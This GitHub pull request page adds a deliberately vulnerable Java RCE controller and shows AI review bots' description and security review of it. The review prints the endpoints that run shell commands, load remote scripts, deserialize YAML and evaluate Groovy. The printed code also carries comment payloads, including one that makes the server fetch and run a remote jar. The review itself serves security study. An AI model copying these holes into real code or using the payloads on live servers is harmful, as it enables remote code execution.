Skip to content

add Rce.java test qodo#8

Open
cccfeng wants to merge 1 commit into
masterfrom
feat33
Open

add Rce.java test qodo#8
cccfeng wants to merge 1 commit into
masterfrom
feat33

Conversation

@cccfeng

@cccfeng cccfeng commented Apr 28, 2025

Copy link
Copy Markdown
Owner

No description provided.

@cccfeng

cccfeng commented Apr 28, 2025

Copy link
Copy Markdown
Owner Author

@CodeRabbit pause

@coderabbitai

coderabbitai Bot commented Apr 28, 2025

Copy link
Copy Markdown
✅ Actions performed

Reviews paused.

Repository owner deleted a comment from coderabbitai Bot Apr 28, 2025
Repository owner deleted a comment from coderabbitai Bot Apr 28, 2025
Repository owner deleted a comment from coderabbitai Bot Apr 28, 2025
Repository owner deleted a comment from coderabbitai Bot Apr 28, 2025
Repository owner deleted a comment from coderabbitai Bot Apr 28, 2025
Repository owner deleted a comment from coderabbitai Bot Apr 28, 2025
Repository owner deleted a comment from coderabbitai Bot Apr 28, 2025
Repository owner deleted a comment from coderabbitai Bot Apr 28, 2025
@cccfeng

cccfeng commented Apr 28, 2025

Copy link
Copy Markdown
Owner Author

@CodiumAI-Agent /describe

Repository owner deleted a comment from sonarqubecloud Bot Apr 28, 2025
@QodoAI-Agent

QodoAI-Agent commented Apr 28, 2025

Copy link
Copy Markdown

Title

add Rce.java test qodo

PR Type

Enhancement

Description

  • New RCE REST controller with multiple exec endpoints

  • Command execution via Runtime and ProcessBuilder

  • Script evaluation: JS, YAML (unsafe/safe), Groovy

  • Demo main method for command touch

Changes walkthrough 📝

Relevant files
Enhancement
Rce2.java
Introduce RCE controller with various exec endpoints         

src/main/java/org/joychou/controller/Rce2.java

  • Introduce Rce controller class in org.joychou.controller
  • Add /runtime/exec and /ProcessBuilder command exec endpoints
  • Implement /jscmd, /vuln/yarm, /sec/yarm, /groovy script eval endpoints
  • Include main method demo for runtime exec
    		• +138/-0 
    Need help?
  • Type /help how to ... in the comments thread for any questions about PR-Agent usage.
  • Check out the documentation for more information.
    		•

    @cccfeng

    cccfeng commented Apr 28, 2025

    Copy link
    Copy Markdown
    Owner Author

    @CodiumAI-Agent /review

    @QodoAI-Agent

    QodoAI-Agent commented Apr 28, 2025

    Copy link
    Copy Markdown

    PR Reviewer Guide 🔍

    Here are some key observations to aid the review process:

    ⏱️ Estimated effort to review: 2 🔵🔵⚪⚪⚪
    🧪 No relevant tests
    🔒 Security concerns

    Remote Code Execution:
    Multiple endpoints directly execute user-supplied content (shell commands, JavaScript, Groovy, YAML payloads) without any input validation or sandboxing, introducing severe RCE vulnerabilities.

    ⚡ Recommended focus areas for review

    Unrestricted Command Execution

    Endpoints CommandExec and processBuilder execute arbitrary shell commands from user input without validation or sanitization, allowing full RCE.

     
    @GetMapping("/runtime/exec")
public String CommandExec(String cmd) {
    Runtime run = Runtime.getRuntime();
    StringBuilder sb = new StringBuilder();

    try {
        Process p = run.exec(cmd);
        BufferedInputStream in = new BufferedInputStream(p.getInputStream());
        BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
        String tmpStr;

        while ((tmpStr = inBr.readLine()) != null) {
            sb.append(tmpStr);
        }

        if (p.waitFor() != 0) {
            if (p.exitValue() == 1)
                return "Command exec failed!!";
        }

        inBr.close();
        in.close();
    } catch (Exception e) {
        return e.toString();
    }
    return sb.toString();
}
    Insecure YAML Deserialization

    The yarm endpoint uses SnakeYAML's default loader to parse untrusted YAML content, exposing the application to deserialization attacks.

     
    @GetMapping("/vuln/yarm")
public void yarm(String content) {
    Yaml y = new Yaml();
    y.load(content);
}
    Dynamic Script Evaluation

    Endpoints jscmd and groovyshell load and execute remote scripts via Nashorn and GroovyShell without sandboxing, enabling arbitrary code execution.

     
    @GetMapping("/jscmd")
public void jsEngine(String jsurl) throws Exception{
    // js nashorn javascript ecmascript
    ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
    Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE);
    String cmd = String.format("load(\"%s\")", jsurl);
    engine.eval(cmd, bindings);
}


/**
 * http://localhost:8080/rce/vuln/yarm?content=!!javax.script.ScriptEngineManager%20[!!java.net.URLClassLoader%20[[!!java.net.URL%20[%22http://test.joychou.org:8086/yaml-payload.jar%22]]]]
 * yaml-payload.jar: https://github.com/artsploit/yaml-payload
 *
 * @param content payloads
 */
@GetMapping("/vuln/yarm")
public void yarm(String content) {
    Yaml y = new Yaml();
    y.load(content);
}

@GetMapping("/sec/yarm")
public void secYarm(String content) {
    Yaml y = new Yaml(new SafeConstructor());
    y.load(content);
}

/**
 * http://localhost:8080/rce/groovy?content="open -a Calculator".execute()
 * @param content groovy shell
 */
@GetMapping("groovy")
public void groovyshell(String content) {
    GroovyShell groovyShell = new GroovyShell();
    groovyShell.evaluate(content);
}

    Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

    Reviewers

    No reviews

    Assignees

    No one assigned

    Labels

    None yet

    Projects

    None yet

    Milestone

    No milestone

    Development

    Successfully merging this pull request may close these issues.

    2 participants

    @cccfeng @QodoAI-Agent